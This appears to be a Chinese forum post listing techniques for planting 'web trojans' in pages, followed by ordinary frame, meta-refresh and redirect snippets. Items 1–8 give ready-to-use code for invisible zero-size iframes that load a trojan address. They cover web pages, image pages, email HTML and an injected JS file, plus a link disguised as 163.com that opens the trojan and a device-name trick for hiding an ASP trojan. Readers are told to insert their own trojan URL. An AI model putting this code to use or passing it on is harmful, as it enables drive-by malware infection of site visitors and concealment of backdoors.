|  | 
 
| 1、嵌入网页 以下是引用片段:
 
 
 复制代码<iframe src="http://网页木马地址" width="0" height="0" border="0"></iframe> 
 
 2、PHP网页挂马
 以下是引用片段:
 
 
 复制代码<iframe src=http://www.baidu.com width=0 height=0></iframe> 
 
 3、图片木马
 以下是引用片段:
 
 
 复制代码<html> 
<body> 
<iframe src=网页木马地址 width=0 height=0></iframe> 
<img src=图片地址></img> 
</body> 
</html> 
 
 4、邮件木马
 以下是引用片段:
 
 
 复制代码<html> 
<body> 
<iframe src=网页木马地址 width=0 height=0></iframe> 
</body> 
</html>
 
 
 5、flash木马
 http://网页木马地址 插入木马地址
 width=10 height=10", "GET" 宽度和高度,方式
 后面的照添,更改木马地址就可以了。
 
 6、做123.JS文件木马
 以下是引用片段:
 
 
 复制代码document.write("<iframe src=就是你的网页木马地址 width=0 height=0></iframe>")
复制代码<script language=javascript src=123.js></script> 
再把这段代码写到 主页上!
 
 7、不点出现连接的木马
 以下是引用片段:
 
 
 复制代码<a href="http://www.163.com(迷惑的超级连接地址,显示这个地址指向木马地址)" > 页面要显示的内容 </a> 
<SCRIPT Language="JavaScript"> 
function www_163_com () 
{ 
var url="你的木马地址"; 
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,
copyhistory=yes,width=800,height=600,left=10,top=10"); 
} 
</SCRIPT>
 
 8、asp木马超级隐藏
 
 
 复制代码copy C:\Inetpub\wwwroot\mm\11.htm \\.\C:\Inetpub\wwwroot\mm\com1.htm
 
 -------------------无聊下划线--------------------------------------------
 
 网页框架代码<iframe border=0 name=lantk src="要嵌入的网页地址" width=400 height=400 allowTransparency scrollbars=yes frameBorder="0"></iframe>
 
 特点是无论使用何种分辨率,它的大小和位置都是不变的。
 
 我所收集的:
 
 1.
 
 
 复制代码<frameset border="0" cols="0,*" frameborder="0" framespacing="0"> 
<frame name="oPlus" src="" noresize> 
<frame name="oMain" src="http://lovelucking.onlybeloved.com" frameborder="0" noresize scrolling="auto"> 
</frameset>
 
 2.右边框架
 
 
 复制代码<frameset cols="*,150" frameborder="0" border="0" framespacing="0"> 
<frame src="http://lovelucking.onlybeloved.com" name="mm" frameborder="0"> 
<frame src="http://右边网址.com" name="rightFrame" frameborder="0" scrolling="NO" noresize> 
</frameset>
 
 3.上下框架
 
 
 复制代码<frameset rows="28,*" frameborder="NO" border="0" framespacing="0"> 
<frame src="http://上部网址/index.htm" name="dj-play" scrolling="no" noresize > 
<frame src="http://lovelucking.onlybeloved.com" name="mainFrame" scrolling="auto"> 
</frameset>
 
 4.网页内嵌框架
 
 
 复制代码<IFRAME align=middle marginWidth=0 vspace=-0 marginHeight=0 src="http://lovelucking.onlybeloved.com" frameBorder=no width=400 scrolling=auto height=300></IFRAME>
 
 ~~~~~
 
 也可以自己修在框架大小:
 <table width="宽大小" height="高大小">
 
 
 
 复制代码<TD align=middle width=宽大小 height=高的大小><IFRAME name=sucai1 
marginWidth=0 frameSpacing=0 marginHeight=0 
src="所要放的网页的地址" frameBorder=0 width=400 
height=380></TD> 
</table> 
</IFRAME>
 
 
 在当前网页中包含另一个网页:
 
 
 
 复制代码<iframe src=另一个网页地址></iframe>
 
 9、网页打开后,隔一定时间自动刷新:
 
 
 
 复制代码<META HTTP-EQUIV="refresh" CONTENT="时间间隔秒">
 
 10、网页打开后,隔一定时间自动跳转到另一页:
 
 
 
 复制代码<meta http-equiv="Refresh" content="时间间隔秒; url=另一个网页地址">
 
 
 两个域名同一个空间自动跳转的ASP代码
 
 
 复制代码<%if Request.ServerVariables("SERVER_NAME")="cdpy.com" then 
response.redirect "default.asp" 
else%> 
<%end if%> 
<%if Request.ServerVariables("SERVER_NAME")="www.cdpy.com" then 
response.redirect "default.asp" 
else%> 
<%end if%> 
<%if Request.ServerVariables("SERVER_NAME")="xingqiba.com" then 
response.redirect "cdhome/default.asp" 
else%> 
<%end if%> 
<%if Request.ServerVariables("SERVER_NAME")="www.xingqiba.com" then 
response.redirect "cdhome/default.asp" 
else%> 
<%end if%> 
<%if Request.ServerVariables("SERVER_NAME")="blog.xingqiba.com" then 
response.redirect "blog/" 
else%>
 html中跳转最全代码
 
 
 复制代码<html> 
<head> 
<meta name="GENERATOR" content="Microsoft FrontPage 5.0"> 
<meta name="ProgId" content="FrontPage.Editor.Document"> 
<meta http-equiv="Content-Type" content="text/html; charset=gb2312"> 
<title>正在进入</title> 
</head> 
<body> 
<form name=loading> 
 <p align=center> <font color="#0066ff" size="2">正在进入,请稍等</font><font color="#0066ff" size="2" face="Arial">...</font> 
  <input type=text name=chart size=46 style="font-family:Arial; font-weight:bolder; color:#0066ff; background-color:#fef4d9; padding:0px; border-style:none;"> 
   
  <input type=text name=percent size=47 style="color:#0066ff; text-align:center; border-width:medium; border-style:none;"> 
  <script>  
var bar=0  
var line="||"  
var amount="||"  
count()  
function count(){  
bar=bar+2  
amount =amount + line  
document.loading.chart.value=amount  
document.loading.percent.value=bar+"%"  
if (bar<99)  
{setTimeout("count()",100);}  
else  
{window.location = "http://xia.7u7.cn";}  
}</script> 
 </p> 
</form> 
<p align="center"> 如果您的浏览器不支持跳转,<a style="text-decoration: none" href="http://xia.7u7.cn"><font color="#FF0000">请点这里</font></a>.</p> 
</body> 
</html> 
 脚本方式 如:
 
 
 复制代码<script language="javascript" type="text/javascript"> 
<!-- 
window.location='index.html'; 
//--> 
</script>
 html的meta方式
 如:
 
 
 复制代码<meta http-equiv='Refresh' content='0;URL=index.html'>
 这种方法的好处是可以控制重定向的时间
 
 | 
 |